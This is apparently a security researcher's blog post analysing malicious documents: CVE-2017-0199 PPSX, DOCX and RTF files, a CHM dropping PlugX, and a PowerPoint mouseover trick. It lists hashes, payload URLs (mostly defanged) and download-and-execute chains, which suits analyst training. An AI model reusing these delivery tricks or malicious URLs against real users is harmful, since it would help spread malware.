[ Sharing ] Analysing simple tricks used in malicious documents

Today i’ll go through with everyone on how to analyse some of the simple tricks used in malicious documents.

The first example that we will go through is a ppsx file using CVE-2017-0199 with “PPSX Script Moniker” bug
SHA256 : d4b345ed6b83fe477f3b30a4f4d124284fb73c38ec918d71284f6abf48982c23
ITW filename : 0Baptist U China1.ppsx
First Submission : 2017-08-10 16:44:45
Last Submission : 2017-08-10 16:44:45


Description:
============

The sample is trying to execute the following scriptlet, script:hxxp://104.243.34.82/jf93jf8yu98yretghw43k4i2i3i4.sct
So you might ask “But how do we normal users know that?”
So loading it up with Profiler, we select “ppt/slides/_rels/slide1.xml.rels” and we can see the following image.

So now let’s inspect the contents of jf93jf8yu98yretghw43k4i2i3i4.sct

Contents of jf93jf8yu98yretghw43k4i2i3i4.sct:
=============================================

Ok now let’s decode the base64 encoded string and see what jf93jf8yu98yretghw43k4i2i3i4.sct is trying to execute in the PowerShell script.

Base64 Decoded String:
======================

After decoding and decompressing, the string looks like the following:

Base64 decoded and decompressed String:
=======================================

As we can see from the code snippet,it will send back data about the victims’ machine and send it back to hxxp://104.243.34.82:8080
After that it will fetch instructions from hxxp://104.243.34.82:8080

If we were to execute the following curl command:

We can see, it’s trying to run a “dir” command on the victims’ machine and send back the data.

Ok let’s move on to another sample.
The next example that we will go through is a chm file. I decided to go through CHM after i read a DeviceGuard UMCI bypass using CHM today, https://msitpros.com/?p=3909.
I won’t go through how the bypass works as the blog post is quite detailed enough. I’ll focus on an old example that was distributing PlugX.
There is a much comprehensive article on chm analysis https://tuts4you.com/download.php?view.2796
SHA256 : 7f4062a38dc5d40eec0ddfd8be6e60c01567f70dfa6ec065cb8ddf996251f369
ITW filename : My Document22s.chm
First Submission : 2017-08-10 07:59:50
Last Submission : 2017-08-10 07:59:50


Description:
============

Ok, let’s load it with Profiler and do some basics DFIR.

As we can see that the DWORD at offset 0x0014 is 0x000804
With reference to
http://chmspec.nongnu.org/latest/, this ID
is the user language ID (from GetUserDefaultLCID) of the
Operating System at the time of compilation.
This means that the default language is Chinese Simplified (Windows Language ID).

If we look at the DWORD at offset 0x0010, it’s 0x4020AE9E
We now know the human readable timse stamp is GMT: Wednesday, February 4, 2004 8:34:38 AM
A timestamp. With reference to http://chmspec.nongnu.org/latest/, this is
derived from GetFileTime() function and is the value of the
dwLowDateTime member of the last write time parameter.

Ok now let’s unzip the chm file as chm is sort of like a zip container.
So let’s load unzipped folder with Profiler again and we can see the following image.

We can see that there are 3 html files. But the first one that is shown to victims is main.html and we can find this interesting code snippet.

As this is fairly trivial to deobfuscate, i won’t go through it but you can use http://dean.edwards.name/unpacker/ to deobfuscate it easily.
We should get back the following code snippet.

Hmmm…the Javascript still look messy. Ok now we can either decode it again or use http://jsnice.org/.
We should get back the following:

A quick glance and we can see that it’s trying to execute the codes in 1.htm.
So let’s move over and take a look at 1.htm

As we can see from the code snippet below, that it’s trying to decode base64decode the base64 encoded string and execute it.
We can also see that it’s trying to base64 decode “bin.base64” but we can’t find it here. Let’s get back to this later. We can also see the dropped payload is named as “MsMpEng.exe” ^^

After base64 decoding, we get back the following. It seems like it is trying to execute xml.htm. Ok, let’s look at that now.

Checking out xml.htm, we can spot “bin.base64” which we found in 1.htm. So what is the base64 encoded blog.

Once we base64 decode it, we get back the payload as shown here.

The dropped payload is actually PlugX and there are many articles on it so i won’t go into the details of it as well.
You can read up on PlugX here:
http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html
https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/

The details of the dropped payload is as follows.
SHA256 : 6a60e950f06a3d9b0eaac81d69a3a6da9e04eff5db9f094ad0a06f7bc983092d
ITW filename : MsMpEng.exe
First Submission : 2014-06-13 07:14:21
Last Submission : 2015-03-12 10:00:17

Ok let’s move on to another sample.
The next example that we will go through is a docx file using CVE-2017-0199
SHA256 : db20e146714121fa02d24a7de2ee0132052e0202856396c95e191453badf7239
ITW filename : Payment_Advice.docx
First Submission : 2014-06-13 06:18:04
Last Submission : 2017-07-04 09:44:54


Description:
============

So let’s load this file with Profiler again and we can see the following image.

As we can see here:

There is an externally linked OLE Object located at, hxxps://a[.]pomf[.]cat/xhiuyr[.]doc

So let’s download this file.
SHA256 : 659CD31DAB50248F741C822C2641B65B5314DB043BFADDE32CD9051AF3FC5FE4
ITW filename : xhiuyr[.]doc

Ok, so this file is not uploaded to VirusTotal yet.
Never mind, let’s load it with Profiler again. We can see that it’s trying to download and execute the binary from hxxps://a[.]pomf[.]cat/kzwhhg[.]exe

Let’s go through another docx file using CVE-2017-0199
SHA256 : f0f6a33e779ebc2ee9553cf413fc93d4236aefb970fd4a4435b45957f0799d9a
ITW filename : BL_INV#086395_PL.docx
First Submission : 2017-08-09 10:50:30
Last Submission : 2017-08-09 10:50:30


Description:
============

So let’s load this file with Profiler again and we can see the following image.

As we can see here:

There is an externally linked OLE Object located at, hxxp://uploads[.]shanatan[.]moe/yytvit[.]doc

So let’s download that as well.
SHA256 : 98ccf03a2fea4984ffe71acd2326e1f7533db78e4f487149daf08ea0935c1534
ITW filename : yytvit.doc
First Submission : 2017-08-03 12:46:47
Last Submission : 2017-08-09 03:11:53

Again, we can load it with Profiler and we can see that this is another CVE-2017-0199 file.

This time round, it’s downloading from hxxps://i[.]memenet[.]org/wfedgl[.]hta
Using curl command, we can see that the wfedgl[.]hta contains a JavaScript.

Now let’s do url decoding of the string and we should get back this.
So it’s trying to execute PowerShell and download the malicious binary from hxxp://uploads[.]shanatan[.]moe/wzglvz[.]exe

The next example that we will go through is a rtf CVE-2017-0199 exploit.
SHA256 : 5e226dbb90541a61203eeb4baef01326aa67a7e9461d1efec0d786c39781aeb7
ITW filename : CN-17069 REQUIRED.doc
First Submission : 2017-08-14 02:47:32
Last Submission : 2017-08-14 05:36:46


Description:
============

Loading up on Profiler, we can see that the sample contained an OLE object as shown here:

However, we can’t find any urls like any other “CVE-2017-0199” samples. Now let’s open it with Notepad++ and check out the RTF file.

Immediately one interesting thing that caught my eye is this string here: {\*\b 0{\*\pxe b}
If we read the specifications on http://www.biblioscape.com/rtf15_spec.htm,

\b turns on bold, whereas \b0 turns off bold.

So let’s just remove {\*\b 0{\*\pxe b} and load it with Profiler again and see whether it helps.
This time round we can see a url, “HtTP:\\193[.]29[.]187[.]49\qb.doc” as shown below.

So now let’s download the other “doc” file.

Inspecting qb.doc with notepad++ and we found this interesting code snippet

It’s not difficult to understand that piece of code snippet:

We can see that it’s downloading from tartakpiotrkow[.]com/.cache/en/emma.exe. So let’s download that.

The downloaded emma.exe is actually LokiBot. There is a detailed paper on LokiBot which you can read it up here:
https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850

The hashes of the 2 files are as follows:
Filename : qb.doc
SHA256 : 31a5b4331429bd6e406c5fb00e814ddafd69b73c71f63c64559e1ee5a1260b94
Filename : emma.exe
SHA256 : ba5271c01380cc148b608a1d0cbed39ef2882bcbf304029ea96d672ff223f73e

The next example that we will go through is a pptx file using mouseover feature of PowerPoint.
SHA256 : b26da51a70618b68a479e21bce499c20d4b280d7c79aa6b054da82c747ccfba1
ITW filename : sample.pptx
First Submission : 2017-08-07 11:05:38
Last Submission : 2017-08-07 11:05:38


Description:
============

Loading up on Profiler, we can see that the sample is trying to abuse the mouseover feature of PowerPoint to launch commands.
This is basically done by using the ppaction:// protocol to launch a commands.

We can see the following codes in “ppt/slides/_rels/slide1.xml.rels”

As we can see here, it’s trying to download from hxxp://youthservicesballarat[.]com[.]au/images/kubrickhead[.]jpg and using msiexec to execute it.

SHA256 : fabcee5f4bab02700375db8a6b1e6a04372f19a4af98d2652ddcc15915374e02
ITW filename : kubrickhead.jpg
First Submission : 2017-08-07 04:30:43
Last Submission : 2017-08-07 04:30:43

If we were to inspect it with Profiler again, we can see that this is really not a jpg file but an MSI installer.

However, we can see that within the msi file, there is a .NET malware.
I shall leave the reversing of the malware as an exercise for the readers.

Thanks & Regards
Jacob Soo